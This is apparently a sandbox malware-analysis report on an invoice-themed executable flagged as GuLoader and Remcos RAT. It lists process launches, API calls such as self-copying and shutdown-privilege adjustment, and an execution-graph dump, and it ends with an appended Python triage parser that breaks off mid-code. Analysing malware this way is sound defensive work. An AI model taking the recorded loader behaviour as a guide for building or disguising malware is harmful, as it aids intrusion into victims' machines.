6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:13:19:36
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:1'091'672 bytes
                                                                                                                                                                                                                    MD5 hash:195787F942427352DB785FEA42C93F43
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:13:19:44
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:13:20:02
                                                                                                                                                                                                                    Start date:31/10/2023
                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn
                                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:20.1%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:19.5%
                                                                                                                                                                                                                      Total number of Nodes:1595
                                                                                                                                                                                                                      Total number of Limit Nodes:37
execution_graph
4680->4682 4681->4682 4682->4581 4684 4067c2 5 API calls 4683->4684 4685 403aec 4684->4685 4686 403af2 4685->4686 4687 403b04 4685->4687 4777 40632f wsprintfW 4686->4777 4688 4062b6 3 API calls 4687->4688 4689 403b34 4688->4689 4690 403b53 lstrcatW 4689->4690 4692 4062b6 3 API calls 4689->4692 4693 403b02 4690->4693 4692->4690 4769 403dae 4693->4769 4696 405dc5 18 API calls 4697 403b85 4696->4697 4698 403c19 4697->4698 4700 4062b6 3 API calls 4697->4700 4699 405dc5 18 API calls 4698->4699 4701 403c1f 4699->4701 4703 403bb7 4700->4703 4702 403c2f LoadImageW 4701->4702 4704 40640a 17 API calls 4701->4704 4705 403cd5 4702->4705 4706 403c56 RegisterClassW 4702->4706 4703->4698 4707 403bd8 lstrlenW 4703->4707 4710 405cea CharNextW 4703->4710 4704->4702 4709 40140b 2 API calls 4705->4709 4708 403c8c SystemParametersInfoW CreateWindowExW 4706->4708 4738 403cdf 4706->4738 4711 403be6 lstrcmpiW 4707->4711 4712 403c0c 4707->4712 4708->4705 4713 403cdb 4709->4713 4714 403bd5 4710->4714 4711->4712 4715 403bf6 GetFileAttributesW 4711->4715 4716 405cbd 3 API calls 4712->4716 4718 403dae 18 API calls 4713->4718 4713->4738 4714->4707 4717 403c02 4715->4717 4719 403c12 4716->4719 4717->4712 4720 405d09 2 API calls 4717->4720 4721 403cec 4718->4721 4778 4063e8 lstrcpynW 4719->4778 4720->4712 4723 403cf8 ShowWindow 4721->4723 4724 403d7b 4721->4724 4726 406752 3 API calls 4723->4726 4779 405523 OleInitialize 4724->4779 4728 403d10 4726->4728 4727 403d81 4729 403d85 4727->4729 4730 403d9d 4727->4730 4731 403d1e GetClassInfoW 4728->4731 4733 406752 3 API calls 4728->4733 4737 40140b 2 API calls 4729->4737 4729->4738 4732 40140b 2 API calls 4730->4732 4734 403d32 GetClassInfoW RegisterClassW 4731->4734 4735 403d48 DialogBoxParamW 4731->4735 4732->4738 4733->4731 4734->4735 4736 40140b 2 API calls 4735->4736 4736->4738 4737->4738 4738->4583 4739->4587 4740->4619 4741->4588 4743 403a01 4742->4743 4744 4039f7 CloseHandle 4742->4744 4745 403a15 4743->4745 4746 403a0b CloseHandle 4743->4746 
4744->4743 4790 403a43 4745->4790 4746->4745 4749 405afa 67 API calls 4750 403819 OleUninitialize 4749->4750 4750->4594 4750->4595 4752 405a63 4751->4752 4753 403838 ExitProcess 4752->4753 4754 405a77 MessageBoxIndirectW 4752->4754 4754->4753 4755->4627 4756->4638 4758 405a10 4757->4758 4759 405a04 CloseHandle 4757->4759 4758->4638 4759->4758 4761 405f1a GetTickCount GetTempFileNameW 4760->4761 4762 405f50 4761->4762 4763 4034a3 4761->4763 4762->4761 4762->4763 4763->4574 4764->4655 4765->4657 4766->4661 4767->4679 4768->4671 4770 403dc2 4769->4770 4786 40632f wsprintfW 4770->4786 4772 403e33 4787 403e67 4772->4787 4774 403b63 4774->4696 4775 403e38 4775->4774 4776 40640a 17 API calls 4775->4776 4776->4775 4777->4693 4778->4698 4780 4043ab SendMessageW 4779->4780 4783 405546 4780->4783 4781 40556d 4782 4043ab SendMessageW 4781->4782 4784 40557f OleUninitialize 4782->4784 4783->4781 4785 401389 2 API calls 4783->4785 4784->4727 4785->4783 4786->4772 4788 40640a 17 API calls 4787->4788 4789 403e75 SetWindowTextW 4788->4789 4789->4775 4791 403a51 4790->4791 4792 403a1a 4791->4792 4793 403a56 FreeLibrary GlobalFree 4791->4793 4792->4749 4793->4792 4793->4793 5893 404ba6 5894 404bd2 5893->5894 5895 404bb6 5893->5895 5897 404c05 5894->5897 5898 404bd8 SHGetPathFromIDListW 5894->5898 5904 405a32 GetDlgItemTextW 5895->5904 5900 404be8 5898->5900 5903 404bef SendMessageW 5898->5903 5899 404bc3 SendMessageW 5899->5894 5901 40140b 2 API calls 5900->5901 5901->5903 5903->5897 5904->5899 5919 4029a8 5920 402c1f 17 API calls 5919->5920 5921 4029ae 5920->5921 5922 4029d5 5921->5922 5923 4029ee 5921->5923 5932 40288b 5921->5932 5926 4029da 5922->5926 5927 4029eb 5922->5927 5924 402a08 5923->5924 5925 4029f8 5923->5925 5929 40640a 17 API calls 5924->5929 5928 402c1f 17 API calls 5925->5928 5933 4063e8 lstrcpynW 5926->5933 5927->5932 5934 40632f wsprintfW 5927->5934 5928->5927 5929->5927 5933->5932 5934->5932 5935 6f1d1671 5936 6f1d1516 GlobalFree 5935->5936 5938 6f1d1689 5936->5938 
5937 6f1d16cf GlobalFree 5938->5937 5939 6f1d16a4 5938->5939 5940 6f1d16bb VirtualFree 5938->5940 5939->5937 5940->5937 5941 4028ad 5942 402c41 17 API calls 5941->5942 5944 4028bb 5942->5944 5943 4028d1 5946 405eb9 2 API calls 5943->5946 5944->5943 5945 402c41 17 API calls 5944->5945 5945->5943 5947 4028d7 5946->5947 5969 405ede GetFileAttributesW CreateFileW 5947->5969 5949 4028e4 5950 4028f0 GlobalAlloc 5949->5950 5951 402987 5949->5951 5952 402909 5950->5952 5953 40297e CloseHandle 5950->5953 5954 4029a2 5951->5954 5955 40298f DeleteFileW 5951->5955 5970 40345d SetFilePointer 5952->5970 5953->5951 5955->5954 5957 40290f 5958 403447 ReadFile 5957->5958 5959 402918 GlobalAlloc 5958->5959 5960 402928 5959->5960 5961 40295c 5959->5961 5963 4031d6 44 API calls 5960->5963 5962 405f90 WriteFile 5961->5962 5964 402968 GlobalFree 5962->5964 5966 402935 5963->5966 5965 4031d6 44 API calls 5964->5965 5968 40297b 5965->5968 5967 402953 GlobalFree 5966->5967 5967->5961 5968->5953 5969->5949 5970->5957 5978 401a30 5979 402c41 17 API calls 5978->5979 5980 401a39 ExpandEnvironmentStringsW 5979->5980 5981 401a4d 5980->5981 5983 401a60 5980->5983 5982 401a52 lstrcmpW 5981->5982 5981->5983 5982->5983 5072 402032 5073 402044 5072->5073 5074 4020f6 5072->5074 5075 402c41 17 API calls 5073->5075 5076 401423 24 API calls 5074->5076 5077 40204b 5075->5077 5082 402250 5076->5082 5078 402c41 17 API calls 5077->5078 5079 402054 5078->5079 5080 40206a LoadLibraryExW 5079->5080 5081 40205c GetModuleHandleW 5079->5081 5080->5074 5083 40207b 5080->5083 5081->5080 5081->5083 5095 406831 WideCharToMultiByte 5083->5095 5086 4020c5 5090 405450 24 API calls 5086->5090 5087 40208c 5088 402094 5087->5088 5089 4020ab 5087->5089 5091 401423 24 API calls 5088->5091 5098 6f1d177b 5089->5098 5092 40209c 5090->5092 5091->5092 5092->5082 5093 4020e8 FreeLibrary 5092->5093 5093->5082 5096 40685b GetProcAddress 5095->5096 5097 402086 5095->5097 5096->5097 5097->5086 5097->5087 5099 6f1d17ae 5098->5099 5140 
6f1d1b63 5099->5140 5101 6f1d17b5 5102 6f1d18da 5101->5102 5103 6f1d17cd 5101->5103 5104 6f1d17c6 5101->5104 5102->5092 5174 6f1d2398 5103->5174 5190 6f1d2356 5104->5190 5109 6f1d17f2 5110 6f1d1831 5109->5110 5111 6f1d1813 5109->5111 5116 6f1d1837 5110->5116 5117 6f1d1882 5110->5117 5203 6f1d256d 5111->5203 5112 6f1d17fc 5112->5109 5200 6f1d2d2f 5112->5200 5113 6f1d17e3 5115 6f1d17e9 5113->5115 5119 6f1d17f4 5113->5119 5115->5109 5184 6f1d2a74 5115->5184 5222 6f1d15c6 5116->5222 5123 6f1d256d 10 API calls 5117->5123 5118 6f1d1819 5214 6f1d15b4 5118->5214 5194 6f1d2728 5119->5194 5127 6f1d1873 5123->5127 5131 6f1d18c9 5127->5131 5229 6f1d2530 5127->5229 5129 6f1d17fa 5129->5109 5130 6f1d256d 10 API calls 5130->5127 5131->5102 5135 6f1d18d3 GlobalFree 5131->5135 5135->5102 5137 6f1d18b5 5137->5131 5233 6f1d153d wsprintfW 5137->5233 5138 6f1d18ae FreeLibrary 5138->5137 5236 6f1d121b GlobalAlloc 5140->5236 5142 6f1d1b87 5237 6f1d121b GlobalAlloc 5142->5237 5144 6f1d1dad GlobalFree GlobalFree GlobalFree 5146 6f1d1dca 5144->5146 5167 6f1d1e14 5144->5167 5145 6f1d1b92 5145->5144 5147 6f1d1c68 GlobalAlloc 5145->5147 5151 6f1d1cb3 lstrcpyW 5145->5151 5152 6f1d1cd1 GlobalFree 5145->5152 5156 6f1d1cbd lstrcpyW 5145->5156 5160 6f1d2068 5145->5160 5162 6f1d20f0 5145->5162 5165 6f1d1d0f 5145->5165 5166 6f1d1fa9 GlobalFree 5145->5166 5145->5167 5171 6f1d122c 2 API calls 5145->5171 5148 6f1d1ddf 5146->5148 5149 6f1d2196 5146->5149 5146->5167 5147->5145 5148->5167 5240 6f1d122c 5148->5240 5150 6f1d21b8 GetModuleHandleW 5149->5150 5149->5167 5153 6f1d21de 5150->5153 5154 6f1d21c9 LoadLibraryW 5150->5154 5151->5156 5152->5145 5244 6f1d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5244 5154->5153 5154->5167 5156->5145 5157 6f1d2230 5159 6f1d223d lstrlenW 5157->5159 5157->5167 5245 6f1d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5159->5245 5243 6f1d121b GlobalAlloc 5160->5243 5161 6f1d21f0 5161->5157 5172 
6f1d221a GetProcAddress 5161->5172 5162->5167 5168 6f1d2138 lstrcpyW 5162->5168 5165->5145 5238 6f1d158f GlobalSize GlobalAlloc 5165->5238 5166->5145 5167->5101 5168->5167 5169 6f1d2257 5169->5167 5171->5145 5172->5157 5173 6f1d2071 5173->5101 5176 6f1d23b0 5174->5176 5175 6f1d122c GlobalAlloc lstrcpynW 5175->5176 5176->5175 5178 6f1d24d9 GlobalFree 5176->5178 5180 6f1d2458 GlobalAlloc WideCharToMultiByte 5176->5180 5181 6f1d2483 GlobalAlloc CLSIDFromString 5176->5181 5183 6f1d24a2 5176->5183 5247 6f1d12ba 5176->5247 5178->5176 5179 6f1d17d3 5178->5179 5179->5109 5179->5112 5179->5113 5180->5178 5181->5178 5183->5178 5251 6f1d26bc 5183->5251 5186 6f1d2a86 5184->5186 5185 6f1d2b2b VirtualAlloc 5187 6f1d2b49 5185->5187 5186->5185 5188 6f1d2c3a GetLastError 5187->5188 5189 6f1d2c45 5187->5189 5188->5189 5189->5109 5191 6f1d236b 5190->5191 5192 6f1d2376 GlobalAlloc 5191->5192 5193 6f1d17cc 5191->5193 5192->5191 5193->5103 5198 6f1d2758 5194->5198 5195 6f1d2806 5197 6f1d280c GlobalSize 5195->5197 5199 6f1d2816 5195->5199 5196 6f1d27f3 GlobalAlloc 5196->5199 5197->5199 5198->5195 5198->5196 5199->5129 5201 6f1d2d3a 5200->5201 5202 6f1d2d7a GlobalFree 5201->5202 5254 6f1d121b GlobalAlloc 5203->5254 5205 6f1d25f0 MultiByteToWideChar 5212 6f1d2577 5205->5212 5206 6f1d2623 lstrcpynW 5206->5212 5207 6f1d2612 StringFromGUID2 5207->5212 5208 6f1d265a GlobalFree 5208->5212 5209 6f1d2636 wsprintfW 5209->5212 5210 6f1d268f GlobalFree 5210->5118 5211 6f1d1272 2 API calls 5211->5212 5212->5205 5212->5206 5212->5207 5212->5208 5212->5209 5212->5210 5212->5211 5255 6f1d12e1 5212->5255 5259 6f1d121b GlobalAlloc 5214->5259 5216 6f1d15b9 5217 6f1d15c6 2 API calls 5216->5217 5218 6f1d15c3 5217->5218 5219 6f1d1272 5218->5219 5220 6f1d127b GlobalAlloc lstrcpynW 5219->5220 5221 6f1d12b5 GlobalFree 5219->5221 5220->5221 5221->5127 5223 6f1d15e4 5222->5223 5224 6f1d15d6 lstrcpyW 5222->5224 5223->5224 5226 6f1d15f0 5223->5226 5227 6f1d161d 5224->5227 5226->5227 5228 6f1d160d wsprintfW 
5226->5228 5227->5130 5228->5227 5230 6f1d253e 5229->5230 5232 6f1d1895 5229->5232 5231 6f1d255a GlobalFree 5230->5231 5230->5232 5231->5230 5232->5137 5232->5138 5234 6f1d1272 2 API calls 5233->5234 5235 6f1d155e 5234->5235 5235->5131 5236->5142 5237->5145 5239 6f1d15ad 5238->5239 5239->5165 5246 6f1d121b GlobalAlloc 5240->5246 5242 6f1d123b lstrcpynW 5242->5167 5243->5173 5244->5161 5245->5169 5246->5242 5248 6f1d12c1 5247->5248 5249 6f1d122c 2 API calls 5248->5249 5250 6f1d12df 5249->5250 5250->5176 5252 6f1d26ca VirtualAlloc 5251->5252 5253 6f1d2720 5251->5253 5252->5253 5253->5183 5254->5212 5256 6f1d130c 5255->5256 5257 6f1d12ea 5255->5257 5256->5212 5257->5256 5258 6f1d12f0 lstrcpyW 5257->5258 5258->5256 5259->5216 5989 402a35 5990 402c1f 17 API calls 5989->5990 5991 402a3b 5990->5991 5992 402a72 5991->5992 5993 40288b 5991->5993 5995 402a4d 5991->5995 5992->5993 5994 40640a 17 API calls 5992->5994 5994->5993 5995->5993 5997 40632f wsprintfW 5995->5997 5997->5993 5998 401735 5999 402c41 17 API calls 5998->5999 6000 40173c SearchPathW 5999->6000 6001 4029e6 6000->6001 6002 401757 6000->6002 6002->6001 6004 4063e8 lstrcpynW 6002->6004 6004->6001 6005 4014b8 6006 4014be 6005->6006 6007 401389 2 API calls 6006->6007 6008 4014c6 6007->6008 6009 401db9 GetDC 6010 402c1f 17 API calls 6009->6010 6011 401dcb GetDeviceCaps MulDiv ReleaseDC 6010->6011 6012 402c1f 17 API calls 6011->6012 6013 401dfc 6012->6013 6014 40640a 17 API calls 6013->6014 6015 401e39 CreateFontIndirectW 6014->6015 6016 402592 6015->6016 6017 40283b 6018 402843 6017->6018 6019 402847 FindNextFileW 6018->6019 6020 402859 6018->6020 6019->6020 6021 4029e6 6020->6021 6023 4063e8 lstrcpynW 6020->6023 6023->6021 6024 6f1d10e1 6033 6f1d1111 6024->6033 6025 6f1d11d8 GlobalFree 6026 6f1d12ba 2 API calls 6026->6033 6027 6f1d11d3 6027->6025 6028 6f1d1272 2 API calls 6032 6f1d11c4 GlobalFree 6028->6032 6029 6f1d1164 GlobalAlloc 6029->6033 6030 6f1d11f8 GlobalFree 6030->6033 6031 6f1d12e1 lstrcpyW 6031->6033 
6032->6033 6033->6025 6033->6026 6033->6027 6033->6028 6033->6029 6033->6030 6033->6031 6033->6032

Control-flow Graph

[Basic-block graph of the routine at 0x4034a5 (blocks 0x4034a5 through 0x4039e0, nodes 0-138) omitted: the executed / not-executed colouring does not survive text extraction. The API sequence the graph encodes is the listing below.]
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000020,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403705
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403721
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040384D
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040385C
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403867
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
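The API listing above is a sandbox trace in a fixed text shape (`Api.MODULE(args), ref: address`, with "Part of subcall function" lines for calls made one frame down). Below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code, of a small parser for that shape together with three triage rules an analyst would run over it: the process rewriting its own TEMP/TMP variables (SetEnvironmentVariableW at 0x403732 and 0x40373A), the sample copying its own executable (CopyFileW at 0x4038FD, into the path assembled from `~nsu` and `.tmp`), and a lookup of SeShutdownPrivilege followed by ExitWindowsEx (0x403975 to 0x4039BD). The sample lines embedded in the block are copied from the listing; the rule names and the functions `parse_api_listing` and `find_findings` are my own. All three behaviours are shared with any package built by the installer whose "NSIS Error" string appears in the GetCommandLineW line, so treat a hit as a packaging lead for further analysis, not as a verdict on the payload.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One line of a Joe Sandbox "APIs" listing has one of these shapes:
#   • Api.MODULE(arg1,arg2,...), ref: 0040XXXX
#   • Api.MODULE ref: 0040XXXX                                   (no arguments recorded)
#   • Part of subcall function 004067C2: Api.MODULE(...), ref: 0040XXXX
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Constructed sample input: seven lines copied from the report's API listing for
# the routine at 0x4034A5, plus one non-API line ("Strings") to show it is skipped.
SAMPLE_PATH = r"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"
SAMPLE_LISTING = r"""
• SetErrorMode.KERNELBASE ref: 004034C8
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
• CopyFileW.KERNEL32(C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
• ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
Strings
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # return address of the call inside the sample image
    subcall_of: Optional[int]  # enclosing function for "Part of subcall function" lines


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every API line of a listing; lines of any other shape are ignored."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            # The listing never quotes commas inside an argument, so a plain split is safe.
            args=raw_args.split(",") if raw_args is not None else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def find_findings(calls: List[ApiCall], sample_path: str) -> List[tuple]:
    """Three triage rules over the parsed calls; each hit is (rule name, return address)."""
    findings = []
    # Rule 1: the process rewrites its own TEMP/TMP environment variables.
    for c in calls:
        if c.api == "SetEnvironmentVariableW" and c.args and c.args[0].upper() in ("TEMP", "TMP"):
            findings.append(("temp-redirect", c.ref))
    # Rule 2: the sample copies its own executable somewhere else.
    for c in calls:
        if c.api == "CopyFileW" and c.args and c.args[0].lower() == sample_path.lower():
            findings.append(("self-copy", c.ref))
    # Rule 3: SeShutdownPrivilege is looked up and ExitWindowsEx follows it in listing
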